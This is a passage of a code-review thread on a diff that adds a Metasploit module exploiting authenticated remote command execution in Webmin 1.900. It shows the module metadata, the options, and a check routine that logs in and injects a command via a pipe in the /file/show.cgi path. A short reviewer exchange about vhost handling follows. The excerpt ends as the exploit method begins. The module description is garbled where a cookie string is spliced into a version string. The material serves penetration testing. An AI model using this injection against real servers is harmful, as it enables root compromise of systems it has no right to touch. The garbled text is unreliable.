modules/exploits/unix/webapp/webmin_1900_rce.rb

```diff
@@ -0,0 +1,296 @@
+        accurately determine directory upload to. Webmin application files can be
+        written/overwritten, thus allowing RCE root. The module has been tested
+        successfully with Webmin 1900 over Debia'cookie' "redirect=1; testing=1;
+        sid=#{session}"n 4.9.18.
+        Using GUESSUPLOAD attempts to use a default installation path in order to trigger the
+        exploit.
+      ),
+      'Author'         => [
+        'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, Initial PoC module
+        'Ziconius <Kris.Anderson[at]immersivelabs.com>' # Updated MSF module; removing 'proc' requirement.
+      ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'https://pentest.com.tr/exploits/Webmin-1900-Remote-Command-Execution.html']
+        ],
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'Space'       => 512,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic perl ruby python telnet'
+            }
+        },
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [['Webmin <= 1.900', {}]],
+      'DisclosureDate' => 'Jan 17 2019',
+      'DefaultTarget'  => 0)
+    )
+    register_options(
+      [
+        Opt::RPORT(10000),
+        OptBool.new('SSL', [true, 'Use SSL', true]),
+        OptBool.new('GUESSUPLOAD', [true, "If no 'proc' permissions exists use default path.", false]),
+        OptString.new('USERNAME',  [true, 'Webmin Username']),
+        OptString.new('PASSWORD',  [true, 'Webmin Password'])
+      ], self.class
+    )
+  end
+
+  ##
+  # Target and input verification
+  ##
+
+  def check
+    vprint_status("Attempting to login...")
+    data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"
+    res = send_request_cgi(
+      {
+        'method'  => 'POST',
+        'uri'     => "/session_login.cgi",
+        'cookie'  => "testing=1",
+        'data'    => data
+      }, 25
+    )
+
+    if res && res.code == 302 && res.get_cookies =~ /sid/
+      print_good "Login successful"
+      session = res.get_cookies.split("sid=")[1].split(";")[0]
+    else
+      print_error "Service found, but login failed"
+      return Exploit::CheckCode::Detected
+    end
+
+    print_status("Attempting to execute...")
+
+    command = "echo #{rand_text_alphanumeric(rand(0..9))}"
+
+    res = send_request_cgi(
+      {
+        'uri'     => "/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|#{command}|",
+        'cookie'  => "sid=#{session}"
+      }, 25
+    )
+
+    if res && res.code == 200 && res.message =~ /Document follows/
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  ##
+  # Exploiting phase
+  ##
+
+  def exploit
+    peer = "#{rhost}:#{rport}"
```

Comment:
This should include vhost if available

Reply:
`peer` should already be defined by the `Msf::Exploit::Remote::HttpClient` mixin and shouldn't need to be redefined.

I *think* the mixin makes use of `vhost` for `peer`.